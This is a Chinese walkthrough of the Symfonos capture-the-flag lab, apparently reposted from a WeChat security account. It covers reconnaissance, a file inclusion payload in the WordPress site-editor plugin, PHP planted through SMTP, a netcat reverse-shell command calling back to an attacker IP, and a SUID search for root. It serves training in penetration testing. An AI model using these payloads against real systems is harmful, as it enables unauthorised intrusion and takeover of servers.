Symfonos靶场打靶记录

admin 2022年9月19日12:38:19安全文章评论14 views1079字阅读3分35秒阅读模式
免责声明
由于传播、利用本公众号狐狸说安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号狐狸说安全及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉,谢谢!

0x01 信息收集阶段

1.arp-scan -l 扫描主机【IP以实际IP为准】

Symfonos靶场打靶记录

2.nmap扫描端口,发现smtp,http,samba服务开放

Symfonos靶场打靶记录

登录web

Symfonos靶场打靶记录

3.-L:显示服务器端所分享出来的所有资源;发现共享文件helios和anonymous

Symfonos靶场打靶记录

0x02 渗透测试阶段

4.指定anonymous用户以guest身份登录

ls发现存在attention.txt文件,get下载文件 查看attention.txt发现三个疑似密码epliioko qwerty baseball

Symfonos靶场打靶记录

5.指定helios用户登录

发现存在research.txt和todo.txt文件,下载到本地

Symfonos靶场打靶记录

6.查看todo.txt,发现疑似url路径

Symfonos靶场打靶记录

7.尝试登录url路径

Symfonos靶场打靶记录

修改/etc/hosts文件,添加一行解析


Symfonos靶场打靶记录

发现可以正常访问

Symfonos靶场打靶记录

8.wpscan工具扫描

因为工具需要联网,场景中不能使用。直接给出结果,扫描到存在site-editor插件,版本1.1.1

wpscan --url http://symfonos.local/h3l105/ --enumeratep,t,tt,cb,dbe,u,m

Symfonos靶场打靶记录

9、site-editor存在文件包含漏洞,输入payload

http://<host>/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

Symfonos靶场打靶记录

10.通过telnet连接smtp25端口,发送php文件。

Symfonos靶场打靶记录

11.测试是否发送成功

http://<host>/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?=/var/mail/helios&c=id

Symfonos靶场打靶记录

12.反弹shell

&c=nc -e /bin/bash 10.10.210.199 7777

Symfonos靶场打靶记录

13.攻击机监听获得shell

Symfonos靶场打靶记录

0x02 提权阶段

14.查找suid文件

find / -perm -u=s 2>/dev/null

Symfonos靶场打靶记录

Symfonos靶场打靶记录

15.提权

Symfonos靶场打靶记录

16.寻找flag文件

Symfonos靶场打靶记录



原文始发于微信公众号(狐狸说安全):Symfonos靶场打靶记录

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月19日12:38:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Symfonos靶场打靶记录 http://cn-sec.com/archives/1304092.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: